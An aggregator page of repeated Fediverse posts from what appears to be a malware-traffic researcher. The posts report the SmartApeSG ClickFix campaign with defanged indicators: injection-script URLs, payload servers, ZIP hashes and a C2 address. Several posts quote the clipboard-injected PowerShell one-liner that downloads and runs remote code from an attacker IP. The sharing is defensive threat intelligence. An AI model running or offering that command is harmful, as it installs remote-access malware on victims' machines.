home.social

#smartapesg — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #smartapesg, aggregated by home.social.

  1. 2026-05-22 (Friday): #SmartApeSG --> Unidentified #RAT --> #NetSupport RAT

    A #pcap of the traffic, associated files, and a list of IOCs are available at malware-traffic-analysis.net/2

    cc: @netresec this is the post that I promised earlier. I'm not able to get the infection chain in any sandbox.

  2. 2026-05-22 (Friday): #SmartApeSG --> Unidentified #RAT --> #NetSupport RAT

    A #pcap of the traffic, associated files, and a list of IOCs are available at malware-traffic-analysis.net/2

    cc: @netresec this is the post that I promised earlier. I'm not able to get the infection chain in any sandbox.

  3. 2026-05-22 (Friday): #SmartApeSG --> Unidentified #RAT --> #NetSupport RAT

    A #pcap of the traffic, associated files, and a list of IOCs are available at malware-traffic-analysis.net/2

    cc: @netresec this is the post that I promised earlier. I'm not able to get the infection chain in any sandbox.

  4. 2026-05-22 (Friday): #SmartApeSG --> Unidentified #RAT --> #NetSupport RAT

    A #pcap of the traffic, associated files, and a list of IOCs are available at malware-traffic-analysis.net/2

    cc: @netresec this is the post that I promised earlier. I'm not able to get the infection chain in any sandbox.

  5. 2026-05-22 (Friday): #SmartApeSG --> Unidentified #RAT --> #NetSupport RAT

    A #pcap of the traffic, associated files, and a list of IOCs are available at malware-traffic-analysis.net/2

    cc: @netresec this is the post that I promised earlier. I'm not able to get the infection chain in any sandbox.

  6. @netresec @monitorsg I'll post something here today with the updated info. The legitimate but compromised nhanhoa[.]org can kick off this infection chain, which I tried in my lab today and saw thunderplanethub[.]top as the #SmartApeSG domain

  7. @netresec @monitorsg I'll post something here today with the updated info. The legitimate but compromised nhanhoa[.]org can kick off this infection chain, which I tried in my lab today and saw thunderplanethub[.]top as the #SmartApeSG domain

  8. @netresec @monitorsg I'll post something here today with the updated info. The legitimate but compromised nhanhoa[.]org can kick off this infection chain, which I tried in my lab today and saw thunderplanethub[.]top as the #SmartApeSG domain

  9. @netresec @monitorsg I'll post something here today with the updated info. The legitimate but compromised nhanhoa[.]org can kick off this infection chain, which I tried in my lab today and saw thunderplanethub[.]top as the #SmartApeSG domain

  10. @netresec @monitorsg I'll post something here today with the updated info. The legitimate but compromised nhanhoa[.]org can kick off this infection chain, which I tried in my lab today and saw thunderplanethub[.]top as the #SmartApeSG domain

  11. 2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity

    SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:

    - hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
    - hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
    - hxxps[:]//vividanchorlab[.]top/auth/routerr-client.js

    TRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:

    - hxxp[:]//178.156.222[.]131/
    - hxxp[:]//5.78.144[.]156/
    - hxxps[:]//astralharborworks[.]com/ground

    SHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:

    - 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20

    POST-INFECTION C2 TRAFFIC:

    - tcp://89.110.110[.]119:443

    cc: @monitorsg

  12. 2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity

    SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:

    - hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
    - hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
    - hxxps[:]//vividanchorlab[.]top/auth/routerr-client.js

    TRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:

    - hxxp[:]//178.156.222[.]131/
    - hxxp[:]//5.78.144[.]156/
    - hxxps[:]//astralharborworks[.]com/ground

    SHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:

    - 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20

    POST-INFECTION C2 TRAFFIC:

    - tcp://89.110.110[.]119:443

    cc: @monitorsg

  13. 2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity

    SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:

    - hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
    - hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
    - hxxps[:]//vividanchorlab[.]top/auth/routerr-client.js

    TRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:

    - hxxp[:]//178.156.222[.]131/
    - hxxp[:]//5.78.144[.]156/
    - hxxps[:]//astralharborworks[.]com/ground

    SHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:

    - 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20

    POST-INFECTION C2 TRAFFIC:

    - tcp://89.110.110[.]119:443

    cc: @monitorsg

  14. 2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity

    SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:

    - hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
    - hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
    - hxxps[:]//vividanchorlab[.]top/auth/routerr-client.js

    TRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:

    - hxxp[:]//178.156.222[.]131/
    - hxxp[:]//5.78.144[.]156/
    - hxxps[:]//astralharborworks[.]com/ground

    SHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:

    - 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20

    POST-INFECTION C2 TRAFFIC:

    - tcp://89.110.110[.]119:443

    cc: @monitorsg

  15. 2026-05-20 (Wednesday): #SmartApeSG #ClickFix activity

    SMARTAPESG TRAFFIC TRIGGERED FROM LEGITIMATE BUT COMPROMISED SITE:

    - hxxps[:]//vividanchorlab[.]top/auth/rate-script.js
    - hxxps[:]//vividanchorlab[.]top/auth/dashboard-schema.php
    - hxxps[:]//vividanchorlab[.]top/auth/routerr-client.js

    TRAFFIC FROM RUNNING SMARTAPESG CLICKFIX TEXT:

    - hxxp[:]//178.156.222[.]131/
    - hxxp[:]//5.78.144[.]156/
    - hxxps[:]//astralharborworks[.]com/ground

    SHA256 HASH FOR DOWNLOADED ZIP ARCHIVE:

    - 6e3663c509debeda6c9f9faa260963973aa3e11f4fce21f9e8ff3ae45f785c20

    POST-INFECTION C2 TRAFFIC:

    - tcp://89.110.110[.]119:443

    cc: @monitorsg

  16. 2026-04-27 (Monday):

    Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:

    - hxxps[:]//datanexlab[.]top/trace/audit-module.js
    - hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
    - hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45

    #ClickFix script injected into clipboard:

    powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)

    Traffic leading to #RAT payload:

    - hxxp[:]//216.120.201[.]116/
    - hxxp[:]//104.225.129[.]105/
    - hxxps[:]//truebasecore[.]com/io

    Zip archive with package for RAT payload:

    - SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365

    #RAT payload C2 traffic:

    - tcp[:]//89.110.110[.]119:443/

  17. 2026-04-27 (Monday):

    Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:

    - hxxps[:]//datanexlab[.]top/trace/audit-module.js
    - hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
    - hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45

    #ClickFix script injected into clipboard:

    powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)

    Traffic leading to #RAT payload:

    - hxxp[:]//216.120.201[.]116/
    - hxxp[:]//104.225.129[.]105/
    - hxxps[:]//truebasecore[.]com/io

    Zip archive with package for RAT payload:

    - SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365

    #RAT payload C2 traffic:

    - tcp[:]//89.110.110[.]119:443/

  18. 2026-04-27 (Monday):

    Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:

    - hxxps[:]//datanexlab[.]top/trace/audit-module.js
    - hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
    - hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45

    #ClickFix script injected into clipboard:

    powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)

    Traffic leading to #RAT payload:

    - hxxp[:]//216.120.201[.]116/
    - hxxp[:]//104.225.129[.]105/
    - hxxps[:]//truebasecore[.]com/io

    Zip archive with package for RAT payload:

    - SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365

    #RAT payload C2 traffic:

    - tcp[:]//89.110.110[.]119:443/

  19. 2026-04-27 (Monday):

    Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:

    - hxxps[:]//datanexlab[.]top/trace/audit-module.js
    - hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
    - hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45

    #ClickFix script injected into clipboard:

    powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)

    Traffic leading to #RAT payload:

    - hxxp[:]//216.120.201[.]116/
    - hxxp[:]//104.225.129[.]105/
    - hxxps[:]//truebasecore[.]com/io

    Zip archive with package for RAT payload:

    - SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365

    #RAT payload C2 traffic:

    - tcp[:]//89.110.110[.]119:443/

  20. 2026-04-27 (Monday):

    Example of #SmartApeSG URLs for fake CAPTCHA/human verification page:

    - hxxps[:]//datanexlab[.]top/trace/audit-module.js
    - hxxps[:]//datanexlab[.]top/trace/refresh-css.php?hZ5akaYM
    - hxxps[:]//datanexlab[.]top/trace/alias-thread.js?78a6eb157b4ca38e45

    #ClickFix script injected into clipboard:

    powershell -c iex(irm 216.120.201[.]116 -UseBasicParsing)

    Traffic leading to #RAT payload:

    - hxxp[:]//216.120.201[.]116/
    - hxxp[:]//104.225.129[.]105/
    - hxxps[:]//truebasecore[.]com/io

    Zip archive with package for RAT payload:

    - SHA256 hash: 5a30867937f1e2f714c8b398436135c63c164267602cc66a5adb5b4c2ed55365

    #RAT payload C2 traffic:

    - tcp[:]//89.110.110[.]119:443/

  21. 2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.

    I'm still not sure what this #malware is yet, but it looks like a RAT.

    Details, some more images, and a #pcap of the traffic are available at malware-traffic-analysis.net/2

  22. 2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.

    I'm still not sure what this #malware is yet, but it looks like a RAT.

    Details, some more images, and a #pcap of the traffic are available at malware-traffic-analysis.net/2

  23. 2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.

    I'm still not sure what this #malware is yet, but it looks like a RAT.

    Details, some more images, and a #pcap of the traffic are available at malware-traffic-analysis.net/2

  24. 2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.

    I'm still not sure what this #malware is yet, but it looks like a RAT.

    Details, some more images, and a #pcap of the traffic are available at malware-traffic-analysis.net/2

  25. 2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.

    I'm still not sure what this #malware is yet, but it looks like a RAT.

    Details, some more images, and a #pcap of the traffic are available at malware-traffic-analysis.net/2

  26. 2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG

    Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553

    Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.

  27. 2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG

    Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553

    Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.

  28. 2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.

    A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at malware-traffic-analysis.net/2

  29. 2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.

    A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at malware-traffic-analysis.net/2

  30. 2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.

    A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at malware-traffic-analysis.net/2

  31. 2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.

    A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at malware-traffic-analysis.net/2

  32. 2026-04-06 (Monday): #ClickFix activity from the #SmartApeSG campaign. Not sure what malware was sent through the fake CAPTCHA page is this time, but it's not the usual.

    A list of indicators, a #pcap of the traffic, malware samples and other files/info are available at malware-traffic-analysis.net/2